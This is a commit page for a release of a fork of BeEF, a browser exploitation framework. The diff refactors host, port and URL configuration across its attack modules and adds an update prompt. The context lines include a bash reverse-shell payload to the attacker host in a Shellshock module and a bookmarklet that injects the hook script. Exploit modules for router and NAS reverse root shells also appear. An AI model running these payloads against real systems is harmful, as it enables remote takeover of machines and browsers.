Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Release 0.5.2.0 (#2166)

Browse Source 
* fixed offline zombie not deleting

* Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161)

Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1.
- [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases)
- [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1)

---
updated-dependencies:
- dependency-name: jsdoc-to-markdown
  dependency-type: direct:development
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Bug: Core - 1785 Fixed public hook url configuration settings (#2163)

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* created command spec file

* add before statement to load all enabled modules to test command class

* add spec to check if configuration instance exists by setting and accessing a config variable

* updated http proto for beef host

* reverting changes on this file, dev values set

* removed some unessessary checks

* fixed grammar test now we're only testing one configuration attribute

* added hook url for contextual usage

* refactoring admin_ui with new code usage

* fixed issue with the location of the beef.http.https.public_enabled

* refactored powershell module and extension

* adding the new config setting for public https beign enabled

* refactor qrcode extension

* replace video fake plugin refactor

* social engineering refactoring

* phonegap module refactoring

* exploit refactoing

* network module refactoing

* ipec module refactoring

* host module refactoring

* debug refactoring

* browser refactoring

* social engineering extension refactoring

* core main server refactoring

* core main console banner refactoring

* removing dev test

* fixed area with location of http.https.enabled

* changed the hook url definition to return the hook file path

* updated banners to use new configuration getters

* updated extensions and modules with the hook url change

* added new public.host configuration settings and validations for depicated usage of public

* updated to use public.port configuration

* added validation for old configuration public_port

* updated to use public https configuration setting

* updated config with new settings format

* fixed get to point to new locations

* fixed pointer to hook_file_path

* Update extensions/social_engineering/web_cloner/web_cloner.rb

Co-authored-by: bcoles <bcoles@gmail.com>

* updated enabled to enable

* making sure default configuration file does not have preset values

Co-authored-by: bcoles <bcoles@gmail.com>

* bumped versions to 0.5.2.0

* Usability: #2145. Added user input request for beef update within 'beef' install script (#2162)

* added user input request for beef update

* swaped git pull from system to backticks

* flags added for auto update and timout to input

* updated install.txt to reference the update-beef script (#2160)

Co-authored-by: Andrew Wheatley <a@andrews-mini.home>
Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: bcoles <bcoles@gmail.com>
This commit is contained in:
wheatley
2021-09-12 21:33:02 +10:00
committed by GitHub
parent c96b5e8968
commit b6425e4a90
59 changed files with 883 additions and 156 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
INSTALL.txt
View File

@@ -67,5 +67,11 @@ it's best to regularly update BeEF to the latest version.
If you're using BeEF from the GitHub repository, updating is as simple as:
$ git pull
$ ./update-beef
Or pull the latest repo yourself and then update the gems with:
$ git pull
$ bundle

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.5.1.0
0.5.2.0

30
beef
View File

@@ -42,6 +42,28 @@ $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
# @note Require core loader
#
require 'core/loader'
require 'timeout'
#
# @note Ask user if they would like to update beef
#
if BeEF::Core::Console::CommandLine.parse[:update_disabled] == false
if BeEF::Core::Console::CommandLine.parse[:update_auto] == true
print "Pulling latest BeEF repository and updating"
`git pull && bundle`
else
begin
answer = Timeout::timeout(5) do
print "Would you like to check and download the latest BeEF update? y/n: "
response = gets
`git pull && bundle` if response.strip == 'y'
end
rescue Timeout::Error
puts "\nUpdate Skipped with input timeout"
end
end
end
#
# @note Create ~/.beef/
@@ -109,13 +131,13 @@ end
#
# @note Validate beef.http.public and beef.http.public_port
#
unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
exit 1
end
unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
exit 1
end

16
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.5.1.0'
version: '0.5.2.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
@@ -47,8 +47,14 @@ beef:
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
# set the public setting below:
# public: ""
# host: "" # public hostname/IP address
# port: "" # public port will default to 80 if no https 443 if https
# and local if not set but there is a public host
# https: false # true/false
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
@@ -56,8 +62,6 @@ beef:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "" # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
@@ -89,6 +93,8 @@ beef:
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"

11
core/main/command.rb
View File

@@ -42,7 +42,8 @@ module BeEF
# Two instances of this object are created during the execution of command module.
#
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname,
:config
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
@@ -55,15 +56,15 @@ module BeEF
# @param [String] key command module key
#
def initialize(key)
config = BeEF::Core::Configuration.instance
@config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@friendlyname = @config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@path = @config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@id = @config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}

126
core/main/configuration.rb
View File

@@ -73,9 +73,122 @@ module BeEF
return
end
return unless validate_public_config_variable?(@config)
if @config['beef']['http']['public_port']
print_error 'Config path beef.http.public_port is deprecated.'
print_error 'Please use the new format for public variables found'
print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
return
end
true
end
#
# Returns the configuration value for the http server host
# If nothing is set it should default to 0.0.0.0 (all interfaces)
def local_host
get('beef.http.host') || '0.0.0.0'
end
#
# Returns the configuration value for the http server port
# If nothing is set it should default to 3000
def local_port
get('beef.http.port') || '3000'
end
#
# Return the local protocol
# if nothing is set default to http
def local_proto
local_https_enabled ? 'https' : 'http'
end
#
# Returns the configuration value for the local https enabled
# If nothing is set it should default to false
def local_https_enabled
get('beef.http.https.enable') || false
end
#
# Returns the configuration value for the http server host
def public_host
get('beef.http.public.host')
end
#
# Returns the beef host which is used by external resources
# e.g. hooked browsers
def beef_host
public_host || local_host
end
#
# Returns the beef port which is used by external resource
# e.g. hooked browsers
def beef_port
public_port || local_port
end
def public_enabled?
!get('beef.http.public.host').nil?
end
#
# Returns the beef protocol that is used by external resources
# e.g. hooked browsers
def beef_proto
if public_enabled? && public_https_enabled? then
return 'https'
elsif public_enabled? && !public_https_enabled?
return 'http'
elsif !public_enabled?
return local_proto
end
end
#
# Returns the beef scheme://host:port for external resources
# e.g. hooked browsers
def beef_url_str
"#{beef_proto}://#{beef_host}:#{beef_port}"
end
# Returns the hool path value stored in the config file
#
# @return [String] hook file path
def hook_file_path
get('beef.http.hook_file') || '/hook.js'
end
# Returns the url to the hook file
#
# @return [String] the url string
def hook_url
"#{beef_url_str}#{hook_file_path}"
end
# Returns the configuration value for the http server port
# If nothing is set it should default to 3000
def public_port
return get('beef.http.public.port') unless get('beef.http.public.port').nil?
return '443' if public_https_enabled?
return '80' unless public_host.nil?
nil
end
#
# Returns the configuration value for the local https enabled
# If nothing is set it should default to false
def public_https_enabled?
get('beef.http.public.https') || false
end
#
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
@@ -163,6 +276,19 @@ module BeEF
)
end
end
private
def validate_public_config_variable?(config)
return true if (config['beef']['http']['public'].is_a?(Hash) ||
config['beef']['http']['public'].is_a?(NilClass))
print_error 'Config path beef.http.public is deprecated.'
print_error 'Please use the new format for public variables found'
print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
false
end
end
end
end

22
core/main/console/banners.rb
View File

@@ -48,7 +48,8 @@ module Banners
def print_network_interfaces_count
# get the configuration information
configuration = BeEF::Core::Configuration.instance
beef_host = configuration.get('beef.http.host')
# local host
beef_host = configuration.local_host
# create an array of the interfaces the framework is listening on
if beef_host == '0.0.0.0' # the framework will listen on all interfaces
@@ -77,27 +78,26 @@ module Banners
#
def print_network_interfaces_routes
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? 'https' : 'http'
hook_file = configuration.get("beef.http.hook_file")
# local config settings
proto = configuration.local_proto
hook_file = configuration.hook_file_path
admin_ui = configuration.get("beef.extension.admin_ui.enable") ? true : false
admin_ui_path = configuration.get("beef.extension.admin_ui.base_path")
# display the hook URL and Admin UI URL on each interface from the interfaces array
self.interfaces.map do |host|
print_info "running on network interface: #{host}"
port = configuration.get("beef.http.port")
port = configuration.local_port
data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
data += "UI URL: #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
print_more data
end
# display the public hook URL and Admin UI URL
if configuration.get("beef.http.public")
host = configuration.get('beef.http.public')
port = configuration.get("beef.http.public_port") || configuration.get('beef.http.port')
if configuration.public_enabled?
print_info 'Public:'
data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
data += "UI URL: #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
data = "Hook URL: #{configuration.hook_url}\n"
data += "UI URL: #{configuration.beef_url_str}#{admin_ui_path}/panel\n" if admin_ui
print_more data
end
end
@@ -130,9 +130,9 @@ module Banners
def print_websocket_servers
config = BeEF::Core::Configuration.instance
ws_poll_timeout = config.get('beef.http.websocket.ws_poll_timeout')
print_info "Starting WebSocket server ws://#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
print_info "Starting WebSocket server ws://#{config.beef_host}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on wss://[#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
end
end
end

10
core/main/console/commandline.rb
View File

@@ -19,6 +19,8 @@ module BeEF
@options[:port] = ""
@options[:ws_port] = ""
@options[:interactive] = false
@options[:update_disabled] = false
@options[:update_auto] = false
@already_parsed = false
@@ -55,6 +57,14 @@ module BeEF
@options[:ws_port] = ws_port
end
opts.on('-ud', '--update_disabled', 'Skips update') do
@options[:update_disabled] = true
end
opts.on('-ua', '--update_auto', 'Automatic update with no prompt') do
@options[:update_auto] = true
end
#opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
# @options[:interactive] = true
#end

31
core/main/server.rb
View File

@@ -12,19 +12,12 @@ module BeEF
module Core
class Server
include Singleton
# @note Grabs the version of beef the framework is deployed on
VERSION = BeEF::Core::Configuration.instance.get('beef.version')
attr_reader :root_dir, :url, :configuration, :command_urls, :mounts, :semaphore
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
@url = "#{beef_proto}://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@url = @configuration.beef_url_str
@root_dir = File.expand_path('../../../', __dir__)
@command_urls = {}
@mounts = {}
@rack_app
@@ -33,16 +26,16 @@ module BeEF
def to_h
{
'beef_version' => VERSION,
'beef_url' => @url,
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? 'https' : 'http',
'client_debug' => @configuration.get('beef.client_debug')
'beef_version' => @configuration.get('beef_version'),
'beef_url' => @url,
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.beef_host,
'beef_port' => @configuration.beef_port,
'beef_public' => @configuration.public_host,
'beef_public_port' => @configuration.public_port,
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.beef_proto,
'client_debug' => @configuration.get('beef.client_debug')
}
end

7
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -7,12 +7,7 @@
WelcomeTab = function() {
<%
@configuration = BeEF::Core::Configuration.instance
beef_proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http";
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_hook = @configuration.get("beef.http.hook_file")
hook_url = "#{beef_proto}://#{beef_host}:#{beef_port}/#{beef_hook}"
hook_url = BeEF::Core::Configuration.instance.hook_url
%>
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"

3
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -111,8 +111,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
listeners: {
itemclick: function(item, object) {
var hb_id = this.contextNode.id.split('zombie-online-')[1];
var hb_id_off = this.contextNode.id.split('zombie-offline-')[1];
var hb_id = this.contextNode.id.split('-')[2];
switch (item.id) {
case 'use_as_proxy':
Ext.Ajax.request({

6
extensions/qrcode/qrcode.rb
View File

@@ -19,9 +19,9 @@ module Qrcode
# get server config
configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get('beef.http.https.enable') == true ? "https" : "http"
beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
beef_proto = configuration.beef_proto
beef_host = configuration.beef_host
beef_port = configuration.beef_port
# get URLs from QR config
configuration.get("beef.extension.qrcode.targets").each do |target|

9
extensions/social_engineering/powershell/bind_powershell.rb
View File

@@ -28,11 +28,10 @@ module BeEF
# serves the HTML Application (HTA)
get '/hta' do
response['Content-Type'] = "application/hta"
host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
@config = BeEF::Core::Configuration.instance
beef_url_str = @config.beef_url_str
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "#{beef_url_str}#{ps_url}/ps.png"
print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
"<script>

5
extensions/social_engineering/web_cloner/web_cloner.rb
View File

@@ -14,10 +14,7 @@ module BeEF
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
beef_proto = @config.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @config.get("beef.http.public") || @config.get("beef.http.host")
beef_port = @config.get("beef.http.public_port") || @config.get("beef.http.port")
@beef_hook = "#{beef_proto}://#{beef_host}:#{beef_port}#{@config.get('beef.http.hook_file')}"
@beef_hook = "#{@config.hook_url}"
end
def clone_page(url, mount, use_existing, dns_spoof)

6
modules/browser/hooked_domain/deface_web_page/module.rb
View File

@@ -7,9 +7,9 @@ class Deface_web_page < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

6
modules/browser/hooked_domain/get_stored_credentials/module.rb
View File

@@ -7,9 +7,9 @@ class Get_stored_credentials < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/butcher/index.html"

6
modules/browser/hooked_domain/site_redirect_iframe/module.rb
View File

@@ -7,9 +7,9 @@ class Site_redirect_iframe < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

6
modules/browser/play_sound/module.rb
View File

@@ -9,9 +9,9 @@ class Play_sound < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
sound_file_url = "#{base_host}/demos/sound.wav"

4
modules/debug/test_network_request/module.rb
View File

@@ -13,8 +13,8 @@ class Test_network_request < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_path = @configuration.get("beef.http.hook_file")
return [

2
modules/exploits/apache_felix_remote_shell/module.rb
View File

@@ -7,7 +7,7 @@ class Apache_felix_remote_shell < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },

2
modules/exploits/farsite_x25_remote_shell/module.rb
View File

@@ -3,7 +3,7 @@ class Farsite_x25_remote_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{ 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],

2
modules/exploits/jenkins_groovy_code_exec/module.rb
View File

@@ -7,7 +7,7 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },

2
modules/exploits/local_host/java_payload/module.rb
View File

@@ -11,7 +11,7 @@ class Java_payload < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},

2
modules/exploits/local_host/signed_applet_dropper/module.rb
View File

@@ -14,7 +14,7 @@ class Signed_applet_dropper < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
{'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},

2
modules/exploits/m0n0wall/module.rb
View File

@@ -10,7 +10,7 @@ class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

2
modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
View File

@@ -10,7 +10,7 @@ class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

2
modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb
View File

@@ -7,7 +7,7 @@ class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

2
modules/exploits/rfi_scanner/module.rb
View File

@@ -149,7 +149,7 @@ EOS
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rproto',

2
modules/exploits/router/wipg1000_cmd_injection/module.rb
View File

@@ -7,7 +7,7 @@ class Wipg1000_cmd_injection < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = '' if lhost.to_s.eql?('0.0.0.0')
return [

2
modules/exploits/shell_shock_scanner/module.rb
View File

@@ -7,7 +7,7 @@ class Shell_shock_scanner < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },

2
modules/exploits/shell_shocked/module.rb
View File

@@ -7,7 +7,7 @@ class Shell_shocked < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = configuration.beef_host
lhost = "LHOST" if lhost == "0.0.0.0"
payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"

2
modules/exploits/vtiger_crm_upload_exploit/module.rb
View File

@@ -16,7 +16,7 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},

2
modules/exploits/wanem_command_execution/module.rb
View File

@@ -10,7 +10,7 @@ class Wanem_command_execution < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},

2
modules/exploits/zenoss_3x_command_execution/module.rb
View File

@@ -10,7 +10,7 @@ class Zenoss_command_execution < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},

2
modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
View File

@@ -6,7 +6,7 @@
class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},

2
modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
View File

@@ -10,7 +10,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},

7
modules/host/hook_microsoft_edge/module.rb
View File

@@ -6,11 +6,8 @@
class Hook_microsoft_edge < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
hook_uri = "#{proto}://#{beef_host}:#{beef_port}/demos/plain.html"
configuration = BeEF::Core::Configuration.instance
hook_uri = "#{configuration.beef_url_str}/demos/plain.html"
return [
{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },

2
modules/ipec/dns_tunnel/module.rb
View File

@@ -7,7 +7,7 @@ class Dns_tunnel < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },

2
modules/network/nat_pinning_irc/module.rb
View File

@@ -11,7 +11,7 @@ class Irc_nat_pinning < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},

8
modules/phonegap/phonegap_persistence/module.rb
View File

@@ -11,10 +11,10 @@ class Phonegap_persistence < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
